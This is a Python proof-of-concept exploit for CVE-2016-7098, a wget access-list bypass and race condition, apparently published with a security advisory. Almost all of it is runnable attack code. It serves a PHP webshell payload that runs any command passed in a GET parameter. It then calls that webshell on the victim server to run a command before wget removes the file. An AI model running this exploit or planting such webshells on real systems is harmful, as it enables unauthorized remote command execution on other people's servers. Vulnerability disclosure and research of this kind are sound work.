#!/usr/bin/env python

#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget. 
#
# Adjust target URL (WEBSHELL_URL) before executing.
# 
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
# 

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80

PAYLOAD='''
<?php
	//our webshell
	system($_GET["cmd"]);
	system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed 
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"

       # Wait for the file to be flushed to disk on remote host etc.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)

       # Request uploaded webshell
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

handler.serve_forever()